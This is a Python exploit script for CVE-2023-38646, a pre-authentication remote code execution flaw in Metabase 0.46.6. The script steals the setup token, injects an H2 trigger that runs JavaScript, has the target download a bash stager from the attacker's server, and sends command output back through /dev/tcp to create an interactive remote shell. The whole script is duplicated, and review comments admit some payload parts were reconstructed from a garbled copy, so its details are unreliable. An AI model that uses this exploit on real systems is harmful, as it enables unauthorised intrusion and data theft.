# Exploit Title: Metabase 0.46.6 - Pre-Auth Remote Code Execution
# Google Dork: N/A
# Date: 13-10-2023
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://www.metabase.com/
# Software Link: https://www.metabase.com/
# Version: Metabase 0.46.6
# Tested on: Ubuntu 22.04, Metabase 0.46.6
# CVE: CVE-2023-38646
# NOTE: the shebang below is not on line 1, so the kernel ignores it; run the script as `python3 <file>`.
#!/usr/bin/env python3
import argparse
import re
import socket
import sys
import threading
from base64 import b64decode
from cmd import Cmd
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from typing import Any

import requests
from termcolor import colored
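class Terminal(Cmd):
    """Minimal interactive prompt: every line typed is executed on the target via shell()."""

    prompt = 'metabase_shell'

    def emptyline(self) -> bool:
        # Cmd's default behaviour re-runs the previous command when the user
        # presses Enter on an empty line; on a remote shell that silently
        # re-executes the last payload, so do nothing instead.
        return False

    def do_EOF(self, args: str) -> bool:
        """Leave the prompt cleanly on Ctrl-D instead of looping on EOF."""
        print()
        return True

    def default(self, args: str) -> None:
        """Treat any input that is not a Cmd built-in as a command for the remote host."""
        shell(args)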
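class Handler(BaseHTTPRequestHandler):
    """Serve the bash stager that the H2 trigger downloads from the attacker host.

    GET /exploitable returns the stager and sets the module-level ``success``
    flag, which exploit() polls to learn that the target reached back.  Any
    other path now gets a 404 instead of an unanswered connection.
    """

    @staticmethod
    def stager(lhost: str, lport: int) -> bytes:
        """Build the stager: run the script's arguments as a command, base64 the
        output and push it to the attacker's listener through bash's /dev/tcp.

        stderr is folded into the pipe so a failing command still reports back.
        Requires bash and a ``base64`` that accepts ``-w 0`` (GNU coreutils) on
        the target.  The ``>`` redirect is missing in this copy of the script
        and was restored; without it the output would never reach the listener.
        """
        return (
            '#!/bin/bash\n'
            f'$@ 2>&1 | base64 -w 0 > /dev/tcp/{lhost}/{lport}\n'
        ).encode()

    def do_GET(self) -> None:
        global success
        if self.path == '/exploitable':
            body = self.stager(argument.lhost, argument.lport)
            self.send_response(200)
            self.send_header('Content-Type', 'text/x-shellscript')
            self.send_header('Content-Length', str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            success = True
        else:
            # Unexpected callback path: show it to the operator and close the
            # request cleanly rather than leaving the client hanging.
            print(self.path)
            self.send_error(404)

    def log_message(self, format: str, *args: Any) -> None:
        """Silence the default per-request access log."""
        return None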
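class Server(ThreadingMixIn, HTTPServer):
    """HTTP server that hands out the stager.

    ThreadingMixIn (imported by the file but previously unused) keeps a slow
    or stalled callback from blocking later requests; daemon_threads stops
    handler threads from keeping the process alive when the script exits.
    """

    daemon_threads = True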
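def run(bind_host: str = '0.0.0.0') -> None:
    """Start the stager HTTP server on ``argument.sport`` and serve until killed.

    Args:
        bind_host: interface to listen on; defaults to all interfaces as before.

    The server object is published as the module-level ``httpserver`` so a
    caller can shut it down.  The original declared ``global httpsserver``
    (typo), so the name it assigned was a local and never actually exported.
    """
    global httpserver
    httpserver = Server((bind_host, argument.sport), Handler)
    httpserver.serve_forever()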
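def exploit() -> None:
    """Fetch the setup token, confirm the target calls back, then open a prompt.

    Flow: GET /api/session/properties exposes ``setup-token`` without
    authentication; POSTing it to /api/setup/validate with an H2 connection
    string makes the server open that H2 URL, and a CREATE TRIGGER embedded in
    the URL runs attacker-supplied JavaScript inside the Metabase JVM.  The
    first trigger only fetches /exploitable from our HTTP server (which sets
    ``success``); once that round trip is seen, an interactive Terminal starts.

    Exits with status 1 when no token is returned (setup already completed, or
    patched) or when the target never calls back within the retry budget.
    """
    global success, setup_token
    print(colored('[*] Retrieving setup token', 'green'))
    resp = requests.get(f'{argument.url}/api/session/properties', timeout=10)
    # Parse the JSON rather than regex-scraping it.  The token is null once
    # first-time setup has been completed, which is the "not exploitable"
    # signal for this path.
    try:
        setup_token = resp.json().get('setup-token') if resp.ok else None
    except ValueError:
        setup_token = None
    if not setup_token:
        print(colored('[-] No setup-token in the response; the target is likely set up already or patched.', 'red'))
        sys.exit(1)
    print(colored(f'[+] Setup token: {setup_token}', 'green'))
    print(colored('[*] Testing if Metabase is vulnerable', 'green'))

    # NOTE(review): in this copy the trigger clause between the trigger name
    # and the $$ JavaScript body, and the tail of that body after
    # openConnection(), are garbled.  "BEFORE SELECT" and ".getContentLength()"
    # are reconstructed and must be checked against the original PoC.
    callback_js = (
        f"new java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable')"
        ".openConnection().getContentLength()"
    )
    # TRACE_LEVEL_SYSTEM_OUT=1 plus the escaped "\;" lets a second statement
    # ride inside the H2 connection-string property; "$$--=x" closes the
    # JavaScript source and comments out whatever H2 appends.
    h2_url = (
        'zip:/app/metabase.jar!/sample-database.db;'
        'MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;'
        'CREATE TRIGGER iampwned BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\n'
        f'{callback_js}\n$$--=x'
    )
    # Key names are Metabase's lowercase API fields; this copy had them
    # case-mangled ("SSL", "Engine", "Advanced-options").
    payload = {
        'token': setup_token,
        'details': {
            'is_on_demand': False,
            'is_full_sync': False,
            'is_sample': False,
            'cache_ttl': None,
            'refingerprint': False,
            'auto_run_queries': True,
            'schedules': {},
            'details': {
                'db': h2_url,
                'advanced-options': False,
                'ssl': True,
            },
            'name': 'An-Sec-Research-Musyoka',
            'engine': 'H2',
        },
    }

    print(colored(f'[+] Starting HTTP server on port {argument.sport}', 'blue'))
    # daemon=True: serve_forever() never returns, and a non-daemon thread would
    # keep the process alive after the sys.exit() below.
    threading.Thread(target=run, daemon=True).start()

    # The original loop compared a counter that was never incremented, so a
    # non-vulnerable target made it spin forever; bound the attempts instead.
    for _attempt in range(120):
        requests.post(f'{argument.url}/api/setup/validate', json=payload, timeout=30)
        if success:
            print(colored('[+] Metabase version seems exploitable', 'green'))
            break
    else:
        print(colored('[-] Service does not appear to be exploitable. Exiting.', 'red'))
        sys.exit(1)
    print(colored('[+] Exploiting server', 'red'))
    Terminal().cmdloop()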
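def receive_command_output(listener: socket.socket) -> None:
    """Accept one connection on an already-listening socket, read until the
    peer closes, base64-decode and print the result.

    Errors are printed rather than raised so a missed callback (accept
    timeout, bad base64) does not kill the interactive prompt.  Both the
    listening and the accepted socket are closed on every path.
    """
    try:
        with listener:
            conn, _addr = listener.accept()
            with conn:
                chunks = []
                while True:
                    chunk = conn.recv(65536)
                    if not chunk:
                        break
                    chunks.append(chunk)
        print(f'\n{b64decode(b"".join(chunks)).decode(errors="replace")}')
    except (OSError, ValueError) as ex:
        print(colored(f'[-] Error: {ex}', 'red'))


def shell(command: str) -> None:
    """Run one command on the target and print its output.

    Two H2 connection strings are sent to /api/setup/validate:
      1. a trigger whose JavaScript makes the JVM ``curl`` the stager from our
         HTTP server into /dev/shm/exec.sh on the target;
      2. a trigger that runs ``bash /dev/shm/exec.sh <command>``.
    The stager base64-encodes the command output and connects back to
    ``argument.lport``, where a listener opened here receives and prints it.

    Args:
        command: command line to execute on the target.  It is spliced into a
            JavaScript string literal, so quotes and backslashes are escaped;
            a newline would terminate the ``$$`` body and is rejected.
            Shell metacharacters appear to reach the stager as plain words
            (it expands ``$@``), so pipes/redirects are not interpreted.
    """
    global setup_token, payload2
    if '\n' in command or '\r' in command:
        print(colored('[-] Newlines are not allowed in the command.', 'red'))
        return

    def trigger_url(js_body: str) -> str:
        # NOTE(review): the clause between the trigger name and the $$ body is
        # garbled in this copy; "BEFORE SELECT ON INFORMATION_SCHEMA.TABLES" is
        # reconstructed and must be checked against the original PoC.
        return (
            'zip:/app/metabase.jar!/sample-database.db;'
            'MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;'
            'CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\n'
            f'{js_body}\n$$--=x'
        )

    stage_js = (
        "java.lang.Runtime.getRuntime().exec("
        f"'curl http://{argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')"
    )
    # Key names are Metabase's lowercase API fields; this copy had them
    # case-mangled ("SSL", "Engine", "Advanced-options").
    payload2 = {
        'token': setup_token,
        'details': {
            'is_on_demand': False,
            'is_full_sync': False,
            'is_sample': False,
            'cache_ttl': None,
            'refingerprint': False,
            'auto_run_queries': True,
            'schedules': {},
            'details': {
                'db': trigger_url(stage_js),
                'advanced-options': False,
                'ssl': True,
            },
            'name': 'An-Sec-Research-Team',
            'engine': 'H2',
        },
    }
    requests.post(f'{argument.url}/api/setup/validate', json=payload2, timeout=30)

    # Bind and listen *before* the exec request goes out.  The original
    # started the listener thread and immediately sent the payload, so the
    # target's callback could race a socket that was not yet accepting.
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(('0.0.0.0', argument.lport))
    listener.listen()
    listener.settimeout(60)  # upper bound on how long the prompt waits for output
    receiver = threading.Thread(target=receive_command_output, args=(listener,), daemon=True)
    receiver.start()

    # Escape for the single-quoted JavaScript literal the command lands in.
    escaped = command.replace('\\', '\\\\').replace("'", "\\'")
    exec_js = f"java.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {escaped}')"
    payload2['details']['details']['db'] = trigger_url(exec_js)
    requests.post(f'{argument.url}/api/setup/validate', json=payload2, timeout=30)
    # Wait for the output so it is printed before Cmd redraws the prompt.
    receiver.join()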
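def bind_function(lport: 'int | None' = None) -> 'str | None':
    """Listen once on ``lport`` (default ``argument.lport``), receive the
    base64-encoded command output from the target's stager, print and return
    the decoded text.

    Reads until the peer closes instead of a single recv(), so output larger
    than one segment is no longer truncated.  The listening and accepted
    sockets are closed on every path (the original leaked both).  Returns
    None on failure; the error is printed so the interactive prompt survives
    a missed callback.
    """
    port = argument.lport if lport is None else lport
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            # Let the listener be re-opened right after a previous one closed.
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            sock.bind(('0.0.0.0', port))
            sock.listen()
            conn, _addr = sock.accept()
            with conn:
                chunks = []
                while True:
                    chunk = conn.recv(65536)
                    if not chunk:
                        break
                    chunks.append(chunk)
        text = b64decode(b''.join(chunks)).decode(errors='replace')
        print(f'\n{text}')
        return text
    except (OSError, ValueError) as ex:
        print(colored(f'[-] Error: {ex}', 'red'))
        return None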
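if __name__ == '__main__':
    print(colored('[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]', 'magenta'))
    parser = argparse.ArgumentParser(description='Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]')
    parser.add_argument('-l', '--lhost', metavar='', help="Attacker's bind IP address", type=str, required=True)
    parser.add_argument('-p', '--lport', metavar='', help="Attacker's bind port", type=int, required=True)
    # This copy declared both --lport and --sport as "-p", which argparse
    # rejects at startup; the HTTP server port gets the upper-case flag.
    parser.add_argument('-P', '--sport', metavar='', help='HTTP server bind port', type=int, required=True)
    parser.add_argument('-u', '--url', metavar='', help='Metabase web application URL', type=str, required=True)
    # ``argument`` is the module-level name the handler and payload builders read.
    argument = parser.parse_args()
    if argument.sport == argument.lport:
        # Both ports are bound on this host; sharing one would fail at bind().
        parser.error('--sport and --lport must be different ports')
    argument.url = argument.url.rstrip('/')
    success = False
    exploit()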
# Google Dork: N/A
# Date: 13-10-2023
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://www.metabase.com/
# Software Link: https://www.metabase.com/
# Version: Metabase 0.46.6
# Tested on: Ubuntu 22.04, Metabase 0.46.6
# CVE: CVE-2023-38646
# NOTE: the shebang below is not on line 1, so the kernel ignores it; run the script as `python3 <file>`.
#!/usr/bin/env python3
import argparse
import re
import socket
import sys
import threading
from base64 import b64decode
from cmd import Cmd
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from typing import Any

import requests
from termcolor import colored
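class Terminal(Cmd):
    """Minimal interactive prompt: every line typed is executed on the target via shell()."""

    prompt = 'metabase_shell'

    def emptyline(self) -> bool:
        # Cmd's default behaviour re-runs the previous command when the user
        # presses Enter on an empty line; on a remote shell that silently
        # re-executes the last payload, so do nothing instead.
        return False

    def do_EOF(self, args: str) -> bool:
        """Leave the prompt cleanly on Ctrl-D instead of looping on EOF."""
        print()
        return True

    def default(self, args: str) -> None:
        """Treat any input that is not a Cmd built-in as a command for the remote host."""
        shell(args)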
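class Handler(BaseHTTPRequestHandler):
    """Serve the bash stager that the H2 trigger downloads from the attacker host.

    GET /exploitable returns the stager and sets the module-level ``success``
    flag, which exploit() polls to learn that the target reached back.  Any
    other path now gets a 404 instead of an unanswered connection.
    """

    @staticmethod
    def stager(lhost: str, lport: int) -> bytes:
        """Build the stager: run the script's arguments as a command, base64 the
        output and push it to the attacker's listener through bash's /dev/tcp.

        stderr is folded into the pipe so a failing command still reports back.
        Requires bash and a ``base64`` that accepts ``-w 0`` (GNU coreutils) on
        the target.  The ``>`` redirect is missing in this copy of the script
        and was restored; without it the output would never reach the listener.
        """
        return (
            '#!/bin/bash\n'
            f'$@ 2>&1 | base64 -w 0 > /dev/tcp/{lhost}/{lport}\n'
        ).encode()

    def do_GET(self) -> None:
        global success
        if self.path == '/exploitable':
            body = self.stager(argument.lhost, argument.lport)
            self.send_response(200)
            self.send_header('Content-Type', 'text/x-shellscript')
            self.send_header('Content-Length', str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            success = True
        else:
            # Unexpected callback path: show it to the operator and close the
            # request cleanly rather than leaving the client hanging.
            print(self.path)
            self.send_error(404)

    def log_message(self, format: str, *args: Any) -> None:
        """Silence the default per-request access log."""
        return None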
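class Server(ThreadingMixIn, HTTPServer):
    """HTTP server that hands out the stager.

    ThreadingMixIn (imported by the file but previously unused) keeps a slow
    or stalled callback from blocking later requests; daemon_threads stops
    handler threads from keeping the process alive when the script exits.
    """

    daemon_threads = True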
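def run(bind_host: str = '0.0.0.0') -> None:
    """Start the stager HTTP server on ``argument.sport`` and serve until killed.

    Args:
        bind_host: interface to listen on; defaults to all interfaces as before.

    The server object is published as the module-level ``httpserver`` so a
    caller can shut it down.  The original declared ``global httpsserver``
    (typo), so the name it assigned was a local and never actually exported.
    """
    global httpserver
    httpserver = Server((bind_host, argument.sport), Handler)
    httpserver.serve_forever()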
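def exploit() -> None:
    """Fetch the setup token, confirm the target calls back, then open a prompt.

    Flow: GET /api/session/properties exposes ``setup-token`` without
    authentication; POSTing it to /api/setup/validate with an H2 connection
    string makes the server open that H2 URL, and a CREATE TRIGGER embedded in
    the URL runs attacker-supplied JavaScript inside the Metabase JVM.  The
    first trigger only fetches /exploitable from our HTTP server (which sets
    ``success``); once that round trip is seen, an interactive Terminal starts.

    Exits with status 1 when no token is returned (setup already completed, or
    patched) or when the target never calls back within the retry budget.
    """
    global success, setup_token
    print(colored('[*] Retrieving setup token', 'green'))
    resp = requests.get(f'{argument.url}/api/session/properties', timeout=10)
    # Parse the JSON rather than regex-scraping it.  The token is null once
    # first-time setup has been completed, which is the "not exploitable"
    # signal for this path.
    try:
        setup_token = resp.json().get('setup-token') if resp.ok else None
    except ValueError:
        setup_token = None
    if not setup_token:
        print(colored('[-] No setup-token in the response; the target is likely set up already or patched.', 'red'))
        sys.exit(1)
    print(colored(f'[+] Setup token: {setup_token}', 'green'))
    print(colored('[*] Testing if Metabase is vulnerable', 'green'))

    # NOTE(review): in this copy the trigger clause between the trigger name
    # and the $$ JavaScript body, and the tail of that body after
    # openConnection(), are garbled.  "BEFORE SELECT" and ".getContentLength()"
    # are reconstructed and must be checked against the original PoC.
    callback_js = (
        f"new java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable')"
        ".openConnection().getContentLength()"
    )
    # TRACE_LEVEL_SYSTEM_OUT=1 plus the escaped "\;" lets a second statement
    # ride inside the H2 connection-string property; "$$--=x" closes the
    # JavaScript source and comments out whatever H2 appends.
    h2_url = (
        'zip:/app/metabase.jar!/sample-database.db;'
        'MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;'
        'CREATE TRIGGER iampwned BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\n'
        f'{callback_js}\n$$--=x'
    )
    # Key names are Metabase's lowercase API fields; this copy had them
    # case-mangled ("SSL", "Engine", "Advanced-options").
    payload = {
        'token': setup_token,
        'details': {
            'is_on_demand': False,
            'is_full_sync': False,
            'is_sample': False,
            'cache_ttl': None,
            'refingerprint': False,
            'auto_run_queries': True,
            'schedules': {},
            'details': {
                'db': h2_url,
                'advanced-options': False,
                'ssl': True,
            },
            'name': 'An-Sec-Research-Musyoka',
            'engine': 'H2',
        },
    }

    print(colored(f'[+] Starting HTTP server on port {argument.sport}', 'blue'))
    # daemon=True: serve_forever() never returns, and a non-daemon thread would
    # keep the process alive after the sys.exit() below.
    threading.Thread(target=run, daemon=True).start()

    # The original loop compared a counter that was never incremented, so a
    # non-vulnerable target made it spin forever; bound the attempts instead.
    for _attempt in range(120):
        requests.post(f'{argument.url}/api/setup/validate', json=payload, timeout=30)
        if success:
            print(colored('[+] Metabase version seems exploitable', 'green'))
            break
    else:
        print(colored('[-] Service does not appear to be exploitable. Exiting.', 'red'))
        sys.exit(1)
    print(colored('[+] Exploiting server', 'red'))
    Terminal().cmdloop()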
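def receive_command_output(listener: socket.socket) -> None:
    """Accept one connection on an already-listening socket, read until the
    peer closes, base64-decode and print the result.

    Errors are printed rather than raised so a missed callback (accept
    timeout, bad base64) does not kill the interactive prompt.  Both the
    listening and the accepted socket are closed on every path.
    """
    try:
        with listener:
            conn, _addr = listener.accept()
            with conn:
                chunks = []
                while True:
                    chunk = conn.recv(65536)
                    if not chunk:
                        break
                    chunks.append(chunk)
        print(f'\n{b64decode(b"".join(chunks)).decode(errors="replace")}')
    except (OSError, ValueError) as ex:
        print(colored(f'[-] Error: {ex}', 'red'))


def shell(command: str) -> None:
    """Run one command on the target and print its output.

    Two H2 connection strings are sent to /api/setup/validate:
      1. a trigger whose JavaScript makes the JVM ``curl`` the stager from our
         HTTP server into /dev/shm/exec.sh on the target;
      2. a trigger that runs ``bash /dev/shm/exec.sh <command>``.
    The stager base64-encodes the command output and connects back to
    ``argument.lport``, where a listener opened here receives and prints it.

    Args:
        command: command line to execute on the target.  It is spliced into a
            JavaScript string literal, so quotes and backslashes are escaped;
            a newline would terminate the ``$$`` body and is rejected.
            Shell metacharacters appear to reach the stager as plain words
            (it expands ``$@``), so pipes/redirects are not interpreted.
    """
    global setup_token, payload2
    if '\n' in command or '\r' in command:
        print(colored('[-] Newlines are not allowed in the command.', 'red'))
        return

    def trigger_url(js_body: str) -> str:
        # NOTE(review): the clause between the trigger name and the $$ body is
        # garbled in this copy; "BEFORE SELECT ON INFORMATION_SCHEMA.TABLES" is
        # reconstructed and must be checked against the original PoC.
        return (
            'zip:/app/metabase.jar!/sample-database.db;'
            'MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;'
            'CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\n'
            f'{js_body}\n$$--=x'
        )

    stage_js = (
        "java.lang.Runtime.getRuntime().exec("
        f"'curl http://{argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')"
    )
    # Key names are Metabase's lowercase API fields; this copy had them
    # case-mangled ("SSL", "Engine", "Advanced-options").
    payload2 = {
        'token': setup_token,
        'details': {
            'is_on_demand': False,
            'is_full_sync': False,
            'is_sample': False,
            'cache_ttl': None,
            'refingerprint': False,
            'auto_run_queries': True,
            'schedules': {},
            'details': {
                'db': trigger_url(stage_js),
                'advanced-options': False,
                'ssl': True,
            },
            'name': 'An-Sec-Research-Team',
            'engine': 'H2',
        },
    }
    requests.post(f'{argument.url}/api/setup/validate', json=payload2, timeout=30)

    # Bind and listen *before* the exec request goes out.  The original
    # started the listener thread and immediately sent the payload, so the
    # target's callback could race a socket that was not yet accepting.
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(('0.0.0.0', argument.lport))
    listener.listen()
    listener.settimeout(60)  # upper bound on how long the prompt waits for output
    receiver = threading.Thread(target=receive_command_output, args=(listener,), daemon=True)
    receiver.start()

    # Escape for the single-quoted JavaScript literal the command lands in.
    escaped = command.replace('\\', '\\\\').replace("'", "\\'")
    exec_js = f"java.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {escaped}')"
    payload2['details']['details']['db'] = trigger_url(exec_js)
    requests.post(f'{argument.url}/api/setup/validate', json=payload2, timeout=30)
    # Wait for the output so it is printed before Cmd redraws the prompt.
    receiver.join()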
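def bind_function(lport: 'int | None' = None) -> 'str | None':
    """Listen once on ``lport`` (default ``argument.lport``), receive the
    base64-encoded command output from the target's stager, print and return
    the decoded text.

    Reads until the peer closes instead of a single recv(), so output larger
    than one segment is no longer truncated.  The listening and accepted
    sockets are closed on every path (the original leaked both).  Returns
    None on failure; the error is printed so the interactive prompt survives
    a missed callback.
    """
    port = argument.lport if lport is None else lport
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            # Let the listener be re-opened right after a previous one closed.
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            sock.bind(('0.0.0.0', port))
            sock.listen()
            conn, _addr = sock.accept()
            with conn:
                chunks = []
                while True:
                    chunk = conn.recv(65536)
                    if not chunk:
                        break
                    chunks.append(chunk)
        text = b64decode(b''.join(chunks)).decode(errors='replace')
        print(f'\n{text}')
        return text
    except (OSError, ValueError) as ex:
        print(colored(f'[-] Error: {ex}', 'red'))
        return None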
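if __name__ == '__main__':
    print(colored('[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]', 'magenta'))
    parser = argparse.ArgumentParser(description='Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]')
    parser.add_argument('-l', '--lhost', metavar='', help="Attacker's bind IP address", type=str, required=True)
    parser.add_argument('-p', '--lport', metavar='', help="Attacker's bind port", type=int, required=True)
    # This copy declared both --lport and --sport as "-p", which argparse
    # rejects at startup; the HTTP server port gets the upper-case flag.
    parser.add_argument('-P', '--sport', metavar='', help='HTTP server bind port', type=int, required=True)
    parser.add_argument('-u', '--url', metavar='', help='Metabase web application URL', type=str, required=True)
    # ``argument`` is the module-level name the handler and payload builders read.
    argument = parser.parse_args()
    if argument.sport == argument.lport:
        # Both ports are bound on this host; sharing one would fail at bind().
        parser.error('--sport and --lport must be different ports')
    argument.url = argument.url.rstrip('/')
    success = False
    exploit()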